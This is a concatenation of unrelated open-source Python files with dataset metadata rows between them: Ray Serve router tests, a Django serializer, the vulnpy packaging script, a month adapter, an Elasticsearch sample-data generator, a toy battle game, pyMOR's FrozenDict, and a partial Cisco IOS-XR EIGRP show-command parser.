wrapped = wrap_to_ray_error(Exception())
assert isinstance(wrapped, ray.exceptions.RayTaskError)
async def test_servable_function(serve_instance, router):
def echo(request):
return request.args["i"]
_ = await add_servable_to_router(echo, router)
for query in [333, 444, 555]:
query_param = make_request_param()
result = await (await router.assign_request.remote(
query_param, i=query))
assert result == query
async def test_servable_class(serve_instance, router):
class MyAdder:
def __init__(self, inc):
self.increment = inc
def __call__(self, request):
return request.args["i"] + self.increment
_ = await add_servable_to_router(MyAdder, router, init_args=(3, ))
for query in [333, 444, 555]:
query_param = make_request_param()
result = await (await router.assign_request.remote(
query_param, i=query))
assert result == query + 3
async def test_task_runner_custom_method_single(serve_instance, router):
class NonBatcher:
def a(self, _):
return "a"
def b(self, _):
return "b"
_ = await add_servable_to_router(NonBatcher, router)
query_param = make_request_param("a")
a_result = await (await router.assign_request.remote(query_param))
assert a_result == "a"
query_param = make_request_param("b")
b_result = await (await router.assign_request.remote(query_param))
assert b_result == "b"
query_param = make_request_param("non_exist")
with pytest.raises(ray.exceptions.RayTaskError):
await (await router.assign_request.remote(query_param))
async def test_task_runner_custom_method_batch(serve_instance, router):
@serve.accept_batch
class Batcher:
def a(self, requests):
return ["a-{}".format(i) for i in range(len(requests))]
def b(self, requests):
return ["b-{}".format(i) for i in range(len(requests))]
backend_config = BackendConfig(
max_batch_size=4,
batch_wait_timeout=10,
internal_metadata=BackendMetadata(accepts_batches=True))
_ = await add_servable_to_router(
Batcher, router, backend_config=backend_config)
a_query_param = make_request_param("a")
b_query_param = make_request_param("b")
futures = [
await router.assign_request.remote(a_query_param) for _ in range(2)
]
futures += [
await router.assign_request.remote(b_query_param) for _ in range(2)
]
gathered = await asyncio.gather(*futures)
assert set(gathered) == {"a-0", "a-1", "b-0", "b-1"}
async def test_servable_batch_error(serve_instance, router):
@serve.accept_batch
class ErrorBatcher:
def error_different_size(self, requests):
return [""] * (len(requests) + 10)
def error_non_iterable(self, _):
return 42
def return_np_array(self, requests):
return np.array([1] * len(requests)).astype(np.int32)
backend_config = BackendConfig(
max_batch_size=4,
internal_metadata=BackendMetadata(accepts_batches=True))
_ = await add_servable_to_router(
ErrorBatcher, router, backend_config=backend_config)
with pytest.raises(RayServeException, match="doesn't preserve batch size"):
different_size = make_request_param("error_different_size")
await (await router.assign_request.remote(different_size))
with pytest.raises(RayServeException, match="iterable"):
non_iterable = make_request_param("error_non_iterable")
await (await router.assign_request.remote(non_iterable))
np_array = make_request_param("return_np_array")
result_np_value = await (await router.assign_request.remote(np_array))
assert isinstance(result_np_value, np.int32)
async def test_task_runner_perform_batch(serve_instance, router):
def batcher(requests):
batch_size = len(requests)
return [batch_size] * batch_size
config = BackendConfig(
max_batch_size=2,
batch_wait_timeout=10,
internal_metadata=BackendMetadata(accepts_batches=True))
_ = await add_servable_to_router(batcher, router, backend_config=config)
query_param = make_request_param()
my_batch_sizes = await asyncio.gather(*[(
await router.assign_request.remote(query_param)) for _ in range(3)])
assert my_batch_sizes == [2, 2, 1]
async def test_task_runner_perform_async(serve_instance, router):
@ray.remote
class Barrier:
def __init__(self, release_on):
self.release_on = release_on
self.current_waiters = 0
self.event = asyncio.Event()
async def wait(self):
self.current_waiters += 1
if self.current_waiters == self.release_on:
self.event.set()
else:
await self.event.wait()
barrier = Barrier.remote(release_on=10)
async def wait_and_go(*args, **kwargs):
await barrier.wait.remote()
return "done!"
config = BackendConfig(
max_concurrent_queries=10,
internal_metadata=BackendMetadata(is_blocking=False))
_ = await add_servable_to_router(
wait_and_go, router, backend_config=config)
query_param = make_request_param()
done, not_done = await asyncio.wait(
[(await router.assign_request.remote(query_param)) for _ in range(10)],
timeout=10)
assert len(done) == 10
for item in done:
await item == "done!"
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
| 30.447471
| 79
| 0.670671
|
c8f36ee3d8b51d41936d8d2c8d492b691bf0593c
| 243
|
py
|
Python
|
books_api/api/serializers.py
|
Ki6an/Django-REST-API
|
2171777209eb928f886d0e8ad713b02770f51276
|
[
"MIT"
] | null | null | null |
books_api/api/serializers.py
|
Ki6an/Django-REST-API
|
2171777209eb928f886d0e8ad713b02770f51276
|
[
"MIT"
] | null | null | null |
books_api/api/serializers.py
|
Ki6an/Django-REST-API
|
2171777209eb928f886d0e8ad713b02770f51276
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from books.models import Book
class BookSerializer(serializers.ModelSerializer):
class Meta:
model = Book
fields = ('title', 'subtitle', 'author', 'isbn') # to add custom fields
| 22.090909
| 81
| 0.695473
|
5db1e25b3f75484a2b2f054ac9bb22e770b71fbd
| 3,079
|
py
|
Python
|
setup.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | null | null | null |
setup.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | null | null | null |
setup.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | null | null | null |
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
try:
with open(os.path.join(here, "README.md")) as f:
README = f.read()
except IOError:
README = ""
trigger_extras = {"PyYAML<6", "lxml>=4.3.1", "mock==3.*"}
aiohttp_extras = {"aiohttp==3.7.*; python_version >= '3.7'"} | trigger_extras
django_extras = {"Django<4"} | trigger_extras
falcon_extras = {"falcon<4", "falcon-multipart==0.2.0"} | trigger_extras
flask_extras = {"Flask<3"} | trigger_extras
fastapi_extras = {
"fastapi<=0.70; python_version >= '3.6'",
"uvicorn[standard]; python_version >= '3.6'",
"python-multipart<1",
} | trigger_extras
gunicorn_max_extras = {
"gunicorn<20.1; python_version < '3.6'",
"gunicorn==20.1.*; python_version >= '3.6'",
}
uwsgi_max_extras = {"uwsgi==2.0.*"}
uwsgi_min_extras = {"uwsgi==2.0.14"}
gunicorn_min_extras = {"gunicorn==0.16.1"}
pyramid_extras = {
"pyramid<2; python_version < '3.6'",
"pyramid<3; python_version >= '3.6'",
"waitress<2.1",
} | trigger_extras
wsgi_extras = trigger_extras
bottle_extras = {"bottle<1"} | trigger_extras
dev_extras = {"WebTest==2.0.*", "tox==3.*"}
all_extras = (
trigger_extras
| aiohttp_extras
| django_extras
| falcon_extras
| flask_extras
| pyramid_extras
| wsgi_extras
| dev_extras
| bottle_extras
| uwsgi_max_extras
| fastapi_extras
| gunicorn_max_extras
)
setup(
name="vulnpy",
version="0.1.0",
description="Purposely-vulnerable functions for application security testing",
long_description=README,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
keywords="security testing",
author="Contrast Security, Inc.",
author_email="python@contrastsecurity.com",
url="https://github.com/Contrast-Security-OSS/vulnpy",
license="MIT",
include_package_data=True,
packages=find_packages("src"),
package_dir={"": "src"},
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*",
extras_require={
"all": all_extras,
"aiohttp": aiohttp_extras,
"django": django_extras,
"falcon": falcon_extras,
"flask": flask_extras,
"fastapi": fastapi_extras,
"pyramid": pyramid_extras,
"bottle": bottle_extras,
"wsgi": wsgi_extras,
"trigger": trigger_extras,
"uwsgi-max": uwsgi_max_extras,
"uwsgi-min": uwsgi_min_extras,
"gunicorn-max": gunicorn_max_extras,
"gunicorn-min": gunicorn_min_extras,
},
)
| 31.10101
| 82
| 0.6291
|
a0646f4e91fbeb3c11650234e95a9fa611d4447c
| 780
|
py
|
Python
|
src/gocept/month/adapter.py
|
gocept/gocept.month
|
a31d285edd631679d22680c432e3419b262ff9c8
|
[
"MIT"
] | null | null | null |
src/gocept/month/adapter.py
|
gocept/gocept.month
|
a31d285edd631679d22680c432e3419b262ff9c8
|
[
"MIT"
] | 3
|
2019-10-28T14:15:55.000Z
|
2021-04-19T11:22:20.000Z
|
src/gocept/month/adapter.py
|
gocept/gocept.month
|
a31d285edd631679d22680c432e3419b262ff9c8
|
[
"MIT"
] | null | null | null |
from gocept.month import Month
def Date(date):
"""Adapter between Date and Month.
>>> from datetime import date
>>> from zope.interface.verify import verifyObject
>>> from gocept.month import IMonth
>>> today = date.today()
>>> verifyObject(IMonth, Date(today))
True
>>> Date(today).month == today.month
True
>>> Date(today).year == today.year
True
>>> Date(date(2005,12,6))
Month 12/2005
>>> str(Date(date(2005,12,6)))
'12/2005'
>>> str(Date(date(2005,12,6)) + 1)
'01/2006'
>>> Date(today) > Month(today.month, today.year-1)
True
>>> Date(today) == Month(today.month, today.year)
True
"""
return Month(date.month, date.year)
def BuiltinStr(date):
return Month.fromString(date)
| 22.941176
| 54
| 0.605128
|
c9dfb33b4297f1333eb927d0cc373cfdef805635
| 4,161
|
py
|
Python
|
IMService/imsservice/src/main/resources/data/generate_es_user_docs.py
|
helenyu18/blue-marlin
|
668985fad1993a682808e271610c1cf2cec6a6f5
|
[
"Apache-2.0"
] | null | null | null |
IMService/imsservice/src/main/resources/data/generate_es_user_docs.py
|
helenyu18/blue-marlin
|
668985fad1993a682808e271610c1cf2cec6a6f5
|
[
"Apache-2.0"
] | null | null | null |
IMService/imsservice/src/main/resources/data/generate_es_user_docs.py
|
helenyu18/blue-marlin
|
668985fad1993a682808e271610c1cf2cec6a6f5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019, Futurewei Technologies
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# * "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import random
from elasticsearch import Elasticsearch
from elasticsearch import helpers
"""
This script generates sample user documents and pushes to elasticsearch.
Each document is called user-doc.
A user-doc contains all the profile driven, location driven and device driven features.
The script generates <num_of_user> number of user-docs.
Each user-doc has both multi-value and single-value features.
The values of these features reflect different activates of the user for a specific day.
For example, "dm" : "mate20-mate10-mate8" shows that the user used 3 different phone models on "2018-01-02".
"2018-01-02" : {
"a" : "4",
"dm" : "mate20-mate10-mate8",
"g" : "g_m",
"ai" : "magazine",
"m" : "cloudFolder-magazinelock",
"ipl" : "7685432-100000-1243278",
"si" : "6-4-1",
"r" : "1243278",
"au" : "_active_30days-wifi_installed_not_activated-shooping-food-travel_installed_not_activated-travel",
"t" : "3G-4G",
"dpc" : "3600_4500",
"pda" : "353",
"pm" : "CPD-CPT"
IMS Service contains the logic to calculate unique number of users that match specific criteria.
"""
es_host = "10.10.10.10"
es_port = 9200
es_index = 'ulp_test_10082019'
es_type = 'doc'
template1 = {
"a": "1-2-3-4",
"g": "g_m-g_f-g_x",
"m": "cloudFolder-magazinelock",
"si": "1-0-3-2-5-4-7-6-9-8",
"r": "100000-1243278-7685432",
"ipl": "100000-1243278-7685432",
"t": "3G-4G",
"dpc": "2500_3500-3600_4500",
"pm": "CPD-CPC-CPT-CPM",
"dm": "mate8-mate10-mate20",
"ai": "game-magazine-movie",
"au": "wifi-wifi_installed_not_activated-_active_30days-life-life_installed_not_activated-shooping-shooping_activated-travel-travel_installed_not_activated-car-car_installed_not_activated-food-food_installed_not_activated",
"pda": "288-354-353"
}
# This generates a list of unique imeis
def generate_imei(size_of_imeis):
imeis = set()
for _ in range(size_of_imeis):
imei = ''
for _ in range(10):
r = random.randint(1, 9)
imei += str(r)
imeis.add(imei)
return list(imeis)
# This generate a random document based on template
def generate_random_doc_from_template():
new_doc = {}
for key, value in template1.items():
vlist = value.split('-')
sample_size = random.randint(1, len(vlist))
new_value = '-'.join(random.sample(vlist, sample_size))
new_doc[key] = new_value
return new_doc
# Generates data for 1 imei
def user_doc_generator(imei):
one_doc = {'_index': es_index, '_type': es_type, 'imei': imei, 'days': {}}
days = ['2018-01-0' + str(dt) for dt in range(1, 8)]
for day in days:
indoc = generate_random_doc_from_template()
one_doc['days'][day] = indoc
return one_doc
if __name__ == "__main__":
es = Elasticsearch([{'host': es_host, 'port': es_port}])
num_of_user = 100
imeis = generate_imei(num_of_user)
actions = [user_doc_generator(imei) for imei in imeis]
helpers.bulk(es, actions)
| 35.262712
| 228
| 0.637106
|
bbfd6451fa1f80bc635734f661d56a4876e31f94
| 184
|
py
|
Python
|
aerende/__init__.py
|
Autophagy/recall
|
1386f2d74b6cb8b3ea52897f00a6e47d8154e3a8
|
[
"MIT"
] | 10
|
2019-01-15T00:37:18.000Z
|
2020-09-01T04:59:26.000Z
|
aerende/__init__.py
|
Autophagy/recall
|
1386f2d74b6cb8b3ea52897f00a6e47d8154e3a8
|
[
"MIT"
] | 1
|
2018-12-22T19:59:03.000Z
|
2019-04-04T14:55:37.000Z
|
aerende/__init__.py
|
Autophagy/recall
|
1386f2d74b6cb8b3ea52897f00a6e47d8154e3a8
|
[
"MIT"
] | 1
|
2021-03-30T13:47:54.000Z
|
2021-03-30T13:47:54.000Z
|
# -*- coding: utf-8 -*-
__title__ = "aerende"
__author__ = "Mika Naylor (Autophagy)"
__license__ = "MIT"
__version__ = (0, 2, 0)
version = "%s.%s.%s" % __version__
title = __title__
| 18.4
| 38
| 0.641304
|
abd268908046dfe13beb09a378149cc953106cc0
| 2,949
|
py
|
Python
|
codes/course7/demo405.py
|
BigShuang/big-shuang-python-introductory-course
|
c4fd1343c4c539567180072c749b68bda7c28075
|
[
"MIT"
] | null | null | null |
codes/course7/demo405.py
|
BigShuang/big-shuang-python-introductory-course
|
c4fd1343c4c539567180072c749b68bda7c28075
|
[
"MIT"
] | null | null | null |
codes/course7/demo405.py
|
BigShuang/big-shuang-python-introductory-course
|
c4fd1343c4c539567180072c749b68bda7c28075
|
[
"MIT"
] | null | null | null |
class Person:
def __init__(self, hp, attack, defence):
self.hp = hp
self.attack = attack
self.defence = defence
def hit(self, other):
damage = self.attack - other.defence
if damage > 0:
other.hp -= damage
def is_alive(self):
return self.hp > 0
class Player(Person):
def __init__(self):
hp, attack, defence = 100, 10, 5
super().__init__(hp, attack, defence)
self.lv = 1
self.base_hp = self.hp
self.exp = [0, 20]
def win(self, enemy):
exp = enemy.drop_exp()
self.exp[0] += enemy.drop_exp()
print("Defeat enemy: %s. Gain exp: %s. Current exp: %s / %s. Left hp: %s" %
(enemy.__class__.__name__, exp, self.exp[0], self.exp[1] ,self.hp))
if self.exp[0] >= self.exp[1]:
self.exp[0] -= self.exp[1]
self.lv_up()
def lv_up(self):
self.exp[1] = self.exp[1] * 2
self.lv += 1
self.base_hp = self.base_hp * 2
self.attack = self.attack * 2
self.defence = self.defence * 2
self.hp = self.base_hp
print("You upgraded, current level: %s, current hp: %s." % (self.lv, self.hp))
def lose(self, enemy):
print("You lost. %s's left hp: %s" % (enemy.__class__.__name__, enemy.hp))
class Enemy(Person):
def __init__(self, base=1):
hp, attack, defence = 50 * base, 10 * base, 5 * base
super().__init__(hp, attack, defence)
self.exp = 10 * base
def drop_exp(self):
return self.exp
class AdvancedEnemy(Enemy):
def hit(self, other):
damage = self.attack
if damage > 0:
other.hp -= damage
def drop_exp(self):
return self.exp * 2
class Boss(Enemy):
def hit(self, other):
damage = self.attack
if damage > 0:
other.hp -= damage
self.hp += damage
def drop_exp(self):
return self.exp * 3
item_map = {
"e": Enemy,
"a": AdvancedEnemy,
"b": Boss,
}
class Game:
def __init__(self):
self.player = Player()
self.running = True
def run(self):
while self.running:
cmd = input("Enter your command:")
cmd = cmd.lower()
if cmd == "s":
pass
else:
self.handle_commands(cmd)
def handle_commands(self, cmd):
for c in cmd:
item_class = item_map[c]
item = item_class()
if isinstance(item, Enemy):
self.fight(item)
def fight(self, enemy):
while True:
self.player.hit(enemy)
if not enemy.is_alive():
self.player.win(enemy)
return
enemy.hit(self.player)
if not self.player.is_alive():
self.player.lose(enemy)
exit()
game = Game()
game.handle_commands("eeab")
| 23.592
| 86
| 0.519159
|
68208583509ae8383f91c28996b67bbe02ec1a4f
| 972
|
py
|
Python
|
src/pymor/tools/frozendict.py
|
JuliaBru/pymor
|
46343b527267213f4279ea36f208b542ab291c4e
|
[
"Unlicense"
] | null | null | null |
src/pymor/tools/frozendict.py
|
JuliaBru/pymor
|
46343b527267213f4279ea36f208b542ab291c4e
|
[
"Unlicense"
] | null | null | null |
src/pymor/tools/frozendict.py
|
JuliaBru/pymor
|
46343b527267213f4279ea36f208b542ab291c4e
|
[
"Unlicense"
] | null | null | null |
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2016 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
# The following implementation is based on
# http://code.activestate.com/recipes/414283-frozen-dictionaries/
class FrozenDict(dict):
"""An immutable dictionary."""
@property
def _blocked_attribute(self):
raise AttributeError('A frozendict cannot be modified.')
__delitem__ = __setitem__ = clear = _blocked_attribute
pop = popitem = setdefault = update = _blocked_attribute
def __new__(cls, *args, **kwargs):
new = dict.__new__(cls)
dict.__init__(new, *args, **kwargs)
return new
def __init__(self, *args, **kwargs):
pass
def __repr__(self):
return 'FrozenDict({})'.format(dict.__repr__(self))
def __reduce__(self):
return (FrozenDict, (dict(self),))
| 30.375
| 77
| 0.68107
|
50ca69a40d50b5777ec0079851968c1538f4b081
| 23,203
|
py
|
Python
|
src/genie/libs/parser/iosxr/show_eigrp.py
|
kacann/genieparser
|
76e19003199c393c59a33546726de3ff5486da80
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxr/show_eigrp.py
|
kacann/genieparser
|
76e19003199c393c59a33546726de3ff5486da80
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxr/show_eigrp.py
|
kacann/genieparser
|
76e19003199c393c59a33546726de3ff5486da80
|
[
"Apache-2.0"
] | 1
|
2021-07-07T18:07:56.000Z
|
2021-07-07T18:07:56.000Z
|
''' show_eigrp.py
IOSXR parser for the following commands
* 'show eigrp ipv4 neighbors'
* 'show eigrp ipv4 vrf {vrf} neighbors'
* 'show eigrp ipv6 neighbors'
* 'show eigrp ipv6 vrf {vrf} neighbors'
* 'show eigrp ipv4 neighbors detail'
* 'show eigrp ipv4 vrf {vrf} neighbors detail'
* 'show eigrp ipv6 neighbors detail'
* 'show eigrp ipv6 vrf {vrf} neighbors detail'
'''
# Python
import re
# Metaparser
from genie.metaparser import MetaParser
from genie.metaparser.util.schemaengine import Any
# Libs
from genie.libs.parser.utils.common import Common
class ShowEigrpNeighborsSchema(MetaParser):
''' Schema for:
* 'show eigrp ipv4 neighbors'
* 'show eigrp ipv4 vrf {vrf} neighbors'
* 'show eigrp ipv6 neighbors'
* 'show eigrp ipv6 vrf {vrf} neighbors'
'''
schema = {
'eigrp_instance': {
Any(): {
'vrf': {
Any(): {
'address_family': {
Any(): {
'name': str,
'named_mode': bool,
'eigrp_interface': {
Any(): {
'eigrp_nbr': {
Any(): {
'peer_handle': int,
'hold': int,
'uptime': str,
'q_cnt': int,
'last_seq_number': int,
'srtt': float,
'rto': int, }, },
},
},
},
},
},
},
},
},
}
# =======================================
# Parser for:
# 'show eigrp ipv4 neighbors'
# 'show eigrp ipv4 vrf {vrf} neighbors'
# 'show eigrp ipv6 neighbors'
# 'show eigrp ipv6 vrf {vrf} neighbors'
# =======================================
class ShowEigrpNeighborsSuperParser(ShowEigrpNeighborsSchema):
def cli(self, vrf='', output=None):
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
r1 = re.compile(r'^(?P<address_family>IPv4|IPv6)\-EIGRP\s+'
'(?:VR\(?(?P<name>\S+)\))?\s*Neighbors\s*for\s*'
'AS\(\s*(?P<as_num>\d+)\)\s*VRF\s*(?P<vrf>\S+)$')
# H Address Interface Hold Uptime SRTT RTO Q Seq
# (sec) (ms) Cnt Num
# 1 10.23.90.3 Gi0/0/0/1.90 13 01:41:56 13 200 0 23
# 0 10.12.90.1 Gi0/0/0/0.90 14 02:55:10 1 200 0 17
# 1 10.23.90.3 Gi0/0/0/1.390 12 01:40:17 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 12 02:52:31 816 4896 0 8
r2 = re.compile(r'^(?P<peer_handle>\d+) +'
'(?P<nbr_address>\S+) +'
'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
'(?P<hold>\d+) +(?P<uptime>\S+) +'
'(?P<srtt>\d+) +'
'(?P<rto>\d+) +'
'(?P<q_cnt>\d+) +'
'(?P<last_seq_number>\d+)$')
# H Address Interface Hold Uptime SRTT RTO Q Seq
# (sec) (ms) Cnt Num
# 1 Link Local Address: Gi0/0/0/1.90 12 01:36:14 11 200 0 28
r3 = re.compile(r'^(?P<peer_handle>\d+) +Link\s+Local\s+Address: +'
'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
'(?P<hold>\d+) +(?P<uptime>\S+) +(?P<srtt>\d+) +'
'(?P<rto>\d+) +(?P<q_cnt>\d+) +'
'(?P<last_seq_number>\d+)$')
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
r4 = re.compile(r'^(?P<nbr_address>\S+)$')
parsed_dict = {}
for line in output.splitlines():
line = line.strip()
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
result = r1.match(line)
if result:
group = result.groupdict()
name = group['name']
named_mode = True if name else False
address_family = group['address_family'].lower()
eigrp_instance = group['as_num']
vrf = group['vrf']
continue
# 1 10.23.90.3 Gi0/0/0/1.90 13 01:41:56 13 200 0 23
# 0 10.12.90.1 Gi0/0/0/0.90 14 02:55:10 1 200 0 17
# 1 10.23.90.3 Gi0/0/0/1.390 12 01:40:17 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 12 02:52:31 816 4896 0 8
result = r2.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = int(group['peer_handle'])
ip_dict['hold'] = int(group['hold'])
ip_dict['uptime'] = group['uptime']
ip_dict['srtt'] = float(group['srtt'])/1000
ip_dict['rto'] = int(group['rto'])
ip_dict['q_cnt'] = int(group['q_cnt'])
ip_dict['last_seq_number'] = int(group['last_seq_number'])
continue
# 1 Link Local Address: Gi0/0/0/1.90 12 01:36:14 11 200 0 28
# 0 Link Local Address: Gi0/0/0/0.90 11 02:30:16 1 200 0 23
result = r3.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
peer_handle = int(group['peer_handle'])
hold = int(group['hold'])
uptime = group['uptime']
srtt = float(group['srtt'])/1000
rto = int(group['rto'])
q_cnt = int(group['q_cnt'])
last_seq_number = int(group['last_seq_number'])
continue
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
result = r4.match(line)
if result:
group = result.groupdict()
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = peer_handle
ip_dict['hold'] = hold
ip_dict['uptime'] = uptime
ip_dict['srtt'] = srtt
ip_dict['rto'] = rto
ip_dict['q_cnt'] = q_cnt
ip_dict['last_seq_number'] = last_seq_number
continue
return parsed_dict
class ShowEigrpIpv4Neighbors(ShowEigrpNeighborsSuperParser,
ShowEigrpNeighborsSchema):
cli_command = ['show eigrp ipv4 vrf {vrf} neighbors',
'show eigrp ipv4 neighbors']
exclude = ['dead_time', 'hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
class ShowEigrpIpv6Neighbors(ShowEigrpNeighborsSuperParser,
ShowEigrpNeighborsSchema):
cli_command = ['show eigrp ipv6 vrf {vrf} neighbors',
'show eigrp ipv6 neighbors']
exclude = ['hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
class ShowEigrpNeighborsDetailSchema(MetaParser):
''' Schema for
* 'show eigrp ipv4 neighbors detail'
* 'show eigrp ipv4 vrf {vrf} neighbors detail'
* 'show eigrp ipv6 neighbors detail'
* 'show eigrp ipv6 vrf {vrf} neighbors detail'
'''
schema = {
'eigrp_instance': {
Any(): {
'vrf': {
Any(): {
'address_family': {
Any(): {
'name': str,
'named_mode': bool,
'eigrp_interface': {
Any(): {
'eigrp_nbr': {
Any(): {
'retransmit_count': int,
'retry_count': int,
'last_seq_number': int,
'srtt': float,
'rto': int,
'q_cnt': int,
'peer_handle': int,
'nbr_sw_ver': {
'os_majorver': int,
'os_minorver': int,
'tlv_majorrev': int,
'tlv_minorrev': int, },
'hold': int,
'uptime': str,
'bfd': str,
'prefixes': int, }, },
},
},
},
},
},
},
},
},
}
# ================================================
# Parser fpr
# 'show eigrp ipv4 neighbors detail'
# 'show eigrp ipv4 vrf {vrf} neighbors detail'
# 'show eigrp ipv6 neighbors detail'
# 'show eigrp ipv6 vrf {vrf} neighbors detail'
# ================================================
class ShowEigrpNeighborsDetailSuperParser(ShowEigrpNeighborsDetailSchema):
def cli(self, vrf='', output=None):
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
r1 = re.compile(r'^(?P<address_family>IPv4|IPv6)\-EIGRP\s+'
'(?:VR\(?(?P<name>\S+)\))?\s*Neighbors\s*for\s*'
'AS\(\s*(?P<as_num>\d+)\)\s*VRF\s*(?P<vrf>\S+)$')
# 1 10.23.90.3 Gi0/0/0/1.90 11 01:43:15 13 200 0 23
# 1 10.23.90.3 Gi0/0/0/1.390 14 01:41:47 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 13 02:54:01 816 4896 0 8
r2 = re.compile(r'^(?P<peer_handle>\d+) +'
'(?P<nbr_address>\S+) +'
'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
'(?P<hold>\d+) +(?P<uptime>\S+) +'
'(?P<srtt>\d+) +'
'(?P<rto>\d+) +'
'(?P<q_cnt>\d+) +'
'(?P<last_seq_number>\d+)$')
# 1 Link Local Address: Gi0/0/0/1.390 11 01:42:44 9 200 0 14
# 0 Link Local Address: Gi0/0/0/0.390 12 02:31:47 4 200 0 9
r3 = re.compile(r'^(?P<peer_handle>\d+) +Link\s+Local\s+Address: +'
'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
'(?P<hold>\d+) +(?P<uptime>\S+) +(?P<srtt>\d+) +'
'(?P<rto>\d+) +(?P<q_cnt>\d+) +'
'(?P<last_seq_number>\d+)$')
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
r4 = re.compile(r'^(?P<nbr_address>\S+)$')
# Version 23.0/2.0, Retrans: 1, Retries: 0, Prefixes: 6
# Version 8.0/1.2, Retrans: 1, Retries: 0, Prefixes: 5
r5 = re.compile(r'Version\s*'
'(?P<os_majorver>\d+)\.(?P<os_minorver>\d+)\/'
'(?P<tlv_majorrev>\d+)\.(?P<tlv_minorrev>\d+), +'
'Retrans\s*:\s*(?P<retransmit_count>\d+)\, +'
'Retries\s*:\s*(?P<retry_count>\d+)\,* *'
'(?:Prefixes\s*:\s*(?P<prefixes>\d+))?')
# BFD disabled
r6 = re.compile(r'^BFD\s+(?P<bfd>\w+)$')
parsed_dict = {}
for line in output.splitlines():
line = line.strip()
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
